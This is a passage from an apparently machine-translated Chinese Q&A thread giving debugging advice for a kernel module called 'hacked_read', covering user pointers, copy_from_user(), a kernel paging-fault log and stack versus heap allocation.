  1. 不在内核地址空间中

  2. 不能指向以空值结尾的字符串

  3. 可能根本不指向映射的内存

不要那样做。使用read()的返回值确定读取了多少数据,并使用copy_from_user()从用户指针复制数据。

答案 1 :(得分:0)

查看日志文件,您可以看到:

  BUG: unable to handle kernel paging request at 00007fffc3497560

此外,指令指针位于:

  RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]

最好的做法是分解功能并找到有问题的指令。

此外,代码需要工作:

  • 您需要检查返回值
  • 您不应在堆栈上为内核模块分配数组。内核空间的堆栈非常有限。您必须在堆上分配。